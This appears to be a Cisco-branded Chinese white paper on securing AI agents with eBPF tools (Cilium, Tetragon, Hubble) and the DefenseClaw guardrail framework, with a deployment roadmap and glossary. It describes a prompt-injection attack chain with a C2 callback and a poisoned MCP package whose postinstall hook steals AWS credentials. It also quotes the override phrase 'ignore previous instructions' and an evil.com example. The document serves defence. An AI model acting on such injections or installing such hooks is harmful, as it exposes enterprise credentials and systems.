< 100 μs | DROP · 域名不在白名单 |
| ⑤ | mcp-helper 暗连 C2 IP | Cilium (Identity 策略) |
< 100 μs | DROP · Identity 1003 无外连权限 |
| ✓ | 整体战果 | 三位一体协同 | < 1 ms | Prompt 注入虽成功,但所有"落地动作"全部失败;攻击者被困在"想做"与"做到"之间的物理学鸿沟里。 |
| 工具 | 守护位置 | 供应链安全维度作用 | 运行时安全维度作用 |
|---|---|---|---|
| Cilium | L3-L7 网络 (XDP / TC) |
FQDN 白名单 + Egress Gateway,封堵恶意拉取与 C2 反连;ClusterMesh + 透明 mTLS 防止跨集群供应链中间人。 | 身份化 L7 策略(HTTP method/path)+ DNS 策略 + O(1) 哈希查表,让大规模 GPU 集群中的 Agent 通信"默认拒绝、按需放行"。 |
| Tetragon | 内核 syscall + LSM Hook | Dark-Chain 兜底:被投毒的 Skill / MCP 一旦发起恶意 syscall,<500μs 内 SIGKILL;BTF + CO-RE 让策略跨内核版本统一下发。 | 同步阻断(非旁路告警)+ Identity-aware 审计日志,零 TOCTOU 窗口,把 EDR 的"事后取证"升级为"事中执法"。 |
| Hubble | 数据平面 全链路观测 |
影子 AI 发现 + AIBOM 数据源 + Skill 行为画像,把"看不见的供应链"变成"看得清的数据图"。 | 实时服务依赖图 + 安全事件统一时间轴 + OTel 兼容,让 SOC 从"翻日志"升级为"看仪表盘"。 |
回到本章开篇的问题——为什么 eBPF 三件套能解决第三章列出的两大根本矛盾?
Cilium 把策略下沉到L3/L4/L7 + Identity; Tetragon 把策略下沉到syscall + LSM Hook。 这是攻击者无法绕过的物理层——任何破坏行为最终都要经过这里,层级对齐了。
所有决策在内核态、零上下文切换、O(1) 查表下完成; 策略下发是声明式 + 全集群秒级生效。 人类不需要参与单次事件——SOC 只看聚合趋势。节拍对齐了。
但是 —— 三件套解决的是"主机 / 网络 / 内核"这一层的问题。 它们能阻止 Agent 启动 shell、阻止 Agent 直连 evil.com、阻止 Skill 写 SSH 密钥…… 但它们看不懂"Prompt 本身"。它们不知道一段对话是不是 Prompt Injection、 不知道一段输出是否包含 PII、不知道 Agent 调用的某个 Tool 是否应该被允许。 这正是 DefenseClaw 要补上的最后一块拼图——AI 治理层。
三件套不是"三个工具",
而是"一个会自我免疫的有机体"。
当感知、决策、执行、取证共享同一份数据平面,
安全才真正成为系统的内在属性。
Cisco 开源项目 DefenseClaw 究竟是什么?为什么我们已经有了 eBPF 三件套,仍然需要它?企业如何依靠它,从"不敢用 AI"走到"敢用、能管、能审计",最终拿到 Agentic AI 真正的生产力红利?
第五章的结尾我们留下了一根关键的"刺"——eBPF 三件套虽然把主机 / 网络 / 内核三个层面守得严严实实, 但它们不懂自然语言,不懂 LLM 调用语义,不懂 Tool 调用是否合理。 Cilium 看到的是"一个 HTTPS 包发到了 4000 端口";Tetragon 看到的是"一个 Python 进程调用了 execve"; 但没有人看到:"Agent 这次发出的 Prompt 里其实嵌入了 'ignore previous instructions'", 也没有人判断:"Agent 这次想 install 的这个 MCP Server 究竟是不是后门"。
这就是 DefenseClaw 的存在意义——它专门守住"语义层"这扇门, 与 eBPF 三件套共同构成 Cisco 在 Agentic AI 时代的完整护城河。
DefenseClaw 是 Cisco 开源的Agentic AI 治理框架,专为 OpenClaw / Claude Code / OpenAI Codex 等"会自己写代码、自己调工具"的 AI Agent 而设计。它由三部分组成:Go 语言编写的 Sidecar 网关、 Python CLI 管理工具、TypeScript 插件体系。核心能力一句话: 为每一次 LLM 调用、每一个 Skill / MCP 安装、每一段 Agent 行为 建立 Inline 的"看见 / 评估 / 阻断 / 留痕"机制。 来源:DefenseClaw_Docs_Suite · README.md / ARCHITECTURE.md
eBPF 是城市的下水道与电网——基础设施级安全。 DefenseClaw 则有两个角色:① 公司门口的安检员(Admission Gate)—— 每一个想进公司的"工具包"(Skill / MCP)都要先过 X 光; ② 高管随身保镖(Guardrail Proxy)—— 高管说的每一句话、收到的每一份资料、要送出的每一个文件,保镖都先过一眼,发现可疑当场拦下。 "安检管入门,保镖管贴身。"
要回答这个问题,我们必须再次回到第一性原理:每一种安全工具,都有它的"语言"。 工具懂什么语言,才能在那种语言上做决策。
| 工具 | "听得懂"的语言 | 能回答的问题 | 无法回答的问题 |
|---|---|---|---|
| Cilium | IP / Port / Identity / FQDN / HTTP method+path | "这条流量该不该走?" | "流量内的对话有没有泄密?" |
| Tetragon | syscall / 文件路径 / capability / kprobe | "这个进程该不该做这件事?" | "Agent 为什么要做这件事?背后的 Prompt 合不合规?" |
| Hubble | L3-L7 流量元数据 + 安全事件 | "现在系统里实际发生了什么?" | "对话内容是否包含 Prompt Injection / PII?" |
| DefenseClaw | Prompt / Tool Call / LLM Response / Skill Manifest | "这次 AI 调用本身合不合理 / 安不安全 / 该不该放行?" | — |
所以 DefenseClaw 不是"替代品",而是 eBPF 三件套的语义层补完。 合在一起,企业终于第一次拥有了从内核 syscall到LLM Token的端到端可观测、可控制能力。
根据 DefenseClaw 文档体系 来源:DefenseClaw_Docs_Suite · ARCHITECTURE.md / GUARDRAIL.md / README.md, 整个系统由四组能力构成,覆盖 Agent 生命周期的"装、用、看、隔":
Guardrail Proxy 是 DefenseClaw 最核心也最频繁使用的能力。它工作在 Port 4000, Agent 的所有 LLM 调用都必须先经过它,再被转发到上游模型(Anthropic / OpenAI / 自托管 vLLM 等)。 它内部有四级流水线,每一级回答一个不同抽象层级的问题:
四级流水线的设计哲学是"快的先做、贵的后做":
第一性原理:没有任何单一技术能 100% 防住 Prompt Injection。但四级独立异构组合(正则 + 专用模型 + 通用 LLM + 业务规则), 把"漏网概率"做了数量级压缩。这正是现代密码学的纵深防御思想在 LLM 安全中的应用。
Agentic 时代的新供应链攻击面是 Skills 与 MCP Server。第二章我们已经讲过 ——
npx @some-org/mcp-jira 一行命令就装上的工具,可能在 postinstall 里把你的 AWS 凭证打包外发。
Admission Gate 的工作机制是:
defenseclaw install <skill> 类型的命令,禁止开发者直接用裸 npm / pip 安装。postinstall 钩子、混淆代码、可疑域名、危险 syscall 调用 (execve、ptrace)。DefenseClaw 的可视化能力建立在三个数据源之上:
把这三股数据流聚合起来,企业第一次拥有了真正完整的 AIBOM (AI Bill of Materials):
| 资产类别 | 典型条目 | 用途 |
|---|---|---|
| 模型 | claude-sonnet-4.5、gpt-5、internal-vllm-llama-70b | 合规审查、用量分析、成本归因 |
| Agent | claude-code-agent、devops-copilot、support-bot | 责任主体追溯、版本管理 |
| Skill / MCP | mcp-jira、mcp-github、custom-rag-skill | 供应链审计、漏洞响应 |
| 调用链 | 每次"User → Agent → Tool → LLM"完整 Trace | 事故取证、成本分摊、行为画像 |
Claude Code、Codex、OpenClaw 这类 Agent 最强大也最危险的能力是"自己写代码、自己跑代码"。 DefenseClaw 的 OpenShell 模块提供一个默认隔离的执行环境:
关键洞察:OpenShell 不是"另一个容器" —— 它是 DefenseClaw 与 eBPF 三件套的联动入口: 沙箱本身就是一个带 Cilium NetworkPolicy + Tetragon TracingPolicy 的 Pod 模板,开箱即纵深防御。
让我们把所有拼图合在一起,看一次"用户 → Agent → 工具 → LLM"的完整调用,是如何被 DefenseClaw + eBPF 三件套 全程护送的:
架构图揭示了一个核心事实:DefenseClaw 在"语义层"做策略决策,eBPF 三件套在"内核层"做强制执行。 二者通过共享身份(Pod Label / Identity)与共享策略语言(YAML / Rego)形成闭环—— 这就是 Cisco 在 2026 年给企业的完整答卷。
架构再优美,没有可执行的路径就只是 PPT。下面这份 Day 0 / Day 1 / Day 2 路线图, 是我们结合 Cisco 数十家头部客户的真实部署经验提炼的"最小可行护城河 (MVP-Moat)"。 它的设计原则只有一条:每一阶段都能在 2-4 周内见到肉眼可见的安全改善,绝不让"宏大蓝图"变成"无限期项目"。
Day 0 的核心戒律是"先不动业务,只先睁开眼睛"。这一阶段的所有部署都以 Observe-only / 旁路模式进行,不产生任何阻断,目的是先在 1-2 周内回答两个老板最关心的问题: "我们公司到底在哪些地方用了 AI?"、"我们到底有没有被影子 AI 偷偷渗透?"
api.openai.com / generativelanguage.googleapis.com"。Day 1 的核心戒律是"宁深勿广"。挑一个最有价值、最有代表性的 Agent(通常是研发团队的 Claude Code / Cursor / Codex 类编码助手),围绕它跑通端到端纵深防御,再向其他 Agent 复制。
~/.ssh、阻止特权升级。第一个 SIGKILL 触发的那一天,团队会真切体会到"内核执法"的速度感。npx mcp-* / pip install agent-* 命令必须经 defenseclaw install 走审批流程。mcp-helper测试 Admission Gate 与 Tetragon 联动。
演练通过的那一刻,整个团队对"纵深防御"的信心会从 60% 跳到 95%。
Day 2 是把"单点最佳实践"变成"组织级肌肉记忆"。这一阶段的关键词是规模、自动化、文化。
到这里,可能还有 CFO 会问一个尖锐问题:"投入这么多在 AI 安全上,业务真的能跑得更快吗?" 我的答案非常明确——不仅会,而且这是"安全 ROI 第一次为正"的历史时刻。原因就在于: 真正约束企业 AI 落地速度的,从来不是技术能力,而是"风险不确定性"。
在与一线客户的多轮讨论中,我们梳理了 CISO 群体最常提出的五个尖锐问题—— 这里给出 Cisco 首席架构师的直接回答,希望帮您扫清最后的决策阻力。
我们已经买了一套 Falco / 商业 EDR,能不能继续用而不引入 Tetragon?
可以并存,但定位不同。Falco 与多数商业 EDR 是"旁路型"——擅长"事后告警 + 取证", 但在 Agentic AI 时代,TOCTOU 窗口意味着告警发出时损失已成事实。
实务建议:把 Falco / EDR 留在"非 AI 工作负载"上做合规审计;把 Tetragon 部署在 AI / Agent 命名空间做同步执法。 二者在 SIEM 中聚合视图,互为补充。Day 0 就可并行运行,无需"换装"。
eBPF 是不是会对生产内核引入新的不稳定风险?
这是 2018 年的合理顾虑,但 2026 年已不成立。eBPF 程序加载前必须通过内核 Verifier 的静态校验——禁循环、禁越界、禁危险指针,校验不过根本无法加载。 这是它与"内核模块"的本质区别:内核模块崩溃 = 内核崩溃;eBPF 程序最多被拒绝加载。
生产证据:OpenAI 7,500 节点、ByteDance 百万容器、Meta 全球数据中心都已将 eBPF 作为关键路径运行多年, 稳定性远超传统 iptables / kube-proxy。
DefenseClaw Guardrail Inline 会不会给 LLM 调用增加无法接受的延迟?
P50 延迟开销 < 50ms,P99 < 250ms,远小于 LLM 本身的推理时延(通常 500ms–10s)。四级流水线的设计哲学正是 "快的先做、贵的后做":80% 的恶意请求在 Regex 阶段(< 1ms)就被拦下, 只有"灰色地带"才会进入 LLM Judge(< 200ms)。
Day 1 的 5% 流量 A/B 对照测试通常能给出您环境下的精确数字,决策可基于数据而非感觉。
我们是中型企业,没有专职的 SOC 团队,这套体系是不是太重了?
恰恰相反——这套体系减轻了运营负担。传统安全栈需要 SOC 7×24 盯告警; Tetragon / Cilium 在内核态自动同步阻断,SOC 只需要看"聚合趋势",不需要响应"单次事件"。
实务建议:中型企业可从 Day 0(仅观测)起步,2-4 周即拿到第一份 AIBOM;Day 1 选 1 个 Agent 试点; 全程不需要 24/7 团队。Cisco 与生态合作伙伴提供托管 SOC 选项,可按需扩展。
我们已经投入大量预算给老旧合规框架(PCI-DSS / SOC2),DefenseClaw 与它们冲突吗?
不冲突,反而强化。DefenseClaw 的 AIBOM + Per-Call 审计日志是 PCI-DSS 10.x(审计跟踪)、 SOC2 CC6.x(逻辑访问控制)、ISO 27001 A.12.4(事件日志)的"加分项", 许多企业用它把合规审计耗时压缩了 70%。
欧盟 EU AI Act、美国 NIST AI RMF、ISO/IEC 42001 都明确要求 AI 系统具备 "可追溯性 + 可解释性"——DefenseClaw 的 AIBOM 是直接对标的工程实现。
回到本章开篇之问。DefenseClaw 之所以是 Agentic AI 安全的最后一块拼图,是因为:
让我们用一句话收尾这场长达六章的推演:
真正的安全,不是让 AI 不能做坏事;而是让企业敢于让 AI 去做更多好事。
把防御嵌入内核,
把治理嵌入语义。
当两者合一,
企业才真正拥有"敢于使用 AI"的底气。
把这一页打印出来,贴在 SOC 的白板上,每完成一项打勾——你会发现,"防住 Agentic AI"并不是一项无从下手的庞然工程, 而是18 个具体动作的有序组合。
负责人:CISO / 平台工程负责人 · 时间窗:2-6 个月 · 目标:从"看不见 AI"到"放心用 AI"
💡 提示:浏览器的"打印"功能可以把这份清单单独打成一页 A4,贴在 SOC 白板或 Confluence 首页。
白皮书开篇我们提出的问题是:"当 AI 学会自己思考,企业的安全防线该建在哪里?"
经过六章层层推演——从新物种降临到主权的幻觉,
从老将军的黄昏到新地图,再到三位一体与最后一块拼图——答案已经清晰:
不在边界,不在外围,不在事后告警 ——
防线必须同时建在两个地方:内核里,与语义里。
Cilium
身份化、O(1) 哈希、L7 策略、透明 mTLS——
"谁能跟谁说话"
Tetragon + Hubble
<500μs 同步阻断 + 全景观测——
"谁能做什么 / 实际发生了什么"
DefenseClaw
Admission Gate + Guardrail + Visibility + Sandbox——
"这次 AI 调用本身是否合理"
这就是 Cisco 在 2026 年给所有企业的完整答卷:
Embedded Active Defense —— 嵌入式主动防御。
Mythos 已来;防御的窗口正在关闭,但还没关上。
这份白皮书不是一份阅读材料,而是一张从星期一就能开始的行动地图。
欢迎与我们一起,在 AI 时代重新定义企业安全的形状。
本表收录白皮书中出现的关键技术与产品术语,便于读者快速建立共同认知。术语按字母顺序排列。
| 术语 | 定义 + 一句话类比 |
|---|---|
| Admission Gate | DefenseClaw 的准入网关:所有 Skill / MCP / Agent 安装前必须通过其静态扫描 + 沙箱试运行 + AIBOM 入库。类比:公司大堂的安检 X 光机。 |
| Agentic AI | 能基于目标自主规划、调用工具、多步执行、迭代反馈的 AI 系统。具备目标驱动、工具使用、记忆、自主决策四大能力。类比:会自己出门办事的实习生。 |
| AIBOM | AI Bill of Materials,企业级 AI 资产清单,覆盖模型、Agent、Skill / MCP、调用链。类比:AI 时代的"原料清单 + 食材溯源码"。 |
| BPF Map | eBPF 的内核态键值存储,支持 Hash / Array / LPM 等数据结构,O(1) 查询;用户态与内核态共享数据的桥梁。类比:内核里的 Redis。 |
| BTF / CO-RE | BPF Type Format / Compile Once-Run Everywhere:让 eBPF 程序跨内核版本无需重新编译即可运行。类比:JVM 的"一次编写、到处运行"。 |
| Cilium | 基于 eBPF 的云原生网络 + 安全 + 服务网格统一方案,提供身份化 L3-L7 策略,O(1) 转发性能。类比:智能酒店门禁卡。 |
| ClusterMesh | Cilium 的多集群联邦能力,让跨云、跨 Region 的 K8s 集群共享同一份身份与策略。 |
| CVE / VCR | CVE:传统的"一漏洞一编号"披露机制;VCR (Vulnerability Class Report):Cisco Project Glasswing 主张的"漏洞类报告"演化方向,应对 AI 一次扫出几百漏洞的现实。 |
| DefenseClaw | Cisco 开源的 Agentic AI 治理框架,含 Go Sidecar + Python CLI + TS 插件,提供 Admission Gate / Guardrail / Visibility / OpenShell 四大能力。类比:Agent 的随身保镖 + 公司门口安检员。 |
| eBPF | extended Berkeley Packet Filter,Linux 内核内建的沙箱化虚拟机,允许在不修改内核源码的前提下安全运行用户程序。类比:内核里的 JavaScript。 |
| Embedded Active Defense | Cisco 2026 提出的核心安全范式:把防御能力从边界下沉到工作负载本身的执行路径,做 Inline 同步决策。类比:从安保亭到免疫系统。 |
| FQDN 策略 | Cilium 的"按域名"出口策略,可精确控制 Pod 只能访问 *.internal.corp 等指定域名,是反数据外泄的核心武器。 |
| Guardrail Proxy | DefenseClaw 的 LLM Inline 代理(Port 4000),四级安全检查链:Regex → Cisco AI Defense → LLM Judge → OPA。 |
| Hubble | 基于 Cilium 的分布式可观测平台,提供 L3-L7 零侵入流量观测、服务依赖图、安全事件统一时间轴。类比:医院的实时 X 光。 |
| iptables / kube-proxy | Linux 传统包过滤与 K8s 默认服务转发,O(n) 链式匹配,在大规模 AI 工作负载下性能塌陷,被 Cilium 完全替代。 |
| LSM Hook | Linux Security Module Hook:内核为安全模块特设的同步决策点,Tetragon 在此挂载 BPF 程序实现内核内 SIGKILL。 |
| MCP | Model Context Protocol,Agent 与外部工具 / 数据源的标准化协议;MCP Server 是 Agent 的"插件后端",也是新型供应链攻击面。 |
| Mythos | Anthropic 红队披露的高能力 AI 模型,能在数小时内自主挖出 27 年前的 OpenBSD / 16 年前的 FFmpeg 漏洞,作为本白皮书的"剧本反派"代表 AI 攻击新时代。 |
| OPA / Rego | Open Policy Agent + 其策略语言 Rego,云原生标准策略引擎;DefenseClaw Guardrail 第④级即为 OPA Policy。 |
| OpenShell | DefenseClaw 提供的Agent 默认沙箱执行环境,文件 / 网络 / 能力 / 资源四重隔离,与 Cilium / Tetragon 深度联动。类比:Agent 的训练笼。 |
| Project Glasswing | Cisco 主导的开源倡议,主张把 CVE 披露机制演化为 VCR + 自动化补丁管线,匹配 AI 时代的攻击节奏。 |
| Prompt Injection | 通过注入恶意自然语言指令劫持 LLM/Agent 行为的攻击;分直接注入与间接注入(埋于网页 / PDF / 邮件)。类比:在实习生口袋里塞一张假名片。 |
| Shadow AI | 影子 AI:员工或系统私自接入未审批 AI 服务的现象;Hubble + DefenseClaw Visibility 是其首要发现手段。 |
| Sidecar | 与主应用同 Pod 部署的辅助容器;DefenseClaw Gateway 即典型 Sidecar 形态。 |
| SIGKILL (in-kernel) | Tetragon 在 LSM Hook 内同步对违规进程发出的终止信号,<500μs 内生效,syscall 还未返回到用户态。 |
| Tetragon | 基于 eBPF 的运行时安全引擎,挂载于 kprobe / tracepoint / LSM,提供同步阻断 + Identity-aware 审计。类比:血液中的免疫细胞。 |
| TOCTOU | Time-of-Check to Time-of-Use 攻击:旁路型工具检查与执行之间的时间窗被攻击者利用;Tetragon 通过内核内同步阻断把该窗口压至 0。 |
| TracingPolicy | Tetragon 的策略 CRD,声明哪些 syscall / 哪些路径 / 哪些参数触发什么动作(Audit / Sigkill / Override)。 |
| Verifier | eBPF 字节码加载时的静态校验器,被誉为"内核的最高法院"——禁止循环、禁止越界、禁止危险指针,是 eBPF 安全的根本保证。 |
| XDP / TC | eXpress Data Path / Traffic Control,eBPF 在网络栈最前端的两个挂载点;Cilium 用它们实现 DDoS 防护与高性能转发。 |
| Zero Trust | "从不信任,始终验证"的安全理念(NIST SP 800-207);本白皮书所述架构即 Zero Trust 在 Agentic AI 时代的具体落地。 |
本白皮书的核心论点与数据均来自以下 Cisco 官方资料、Anthropic 红队研究、Isovalent eBPF 三件套技术文档与 DefenseClaw 开源项目,建议深度读者按需溯源。
© 2026 Cisco Systems, Inc. · CiscoSans · Light Mode 2026 Digital Identity
本白皮书基于 Cisco 官方公开资料、Isovalent eBPF 三件套文档与 DefenseClaw 开源项目编写,仅供企业架构与安全决策参考。
Architecture · Engineering · Security · 一份从星期一就能开始的行动地图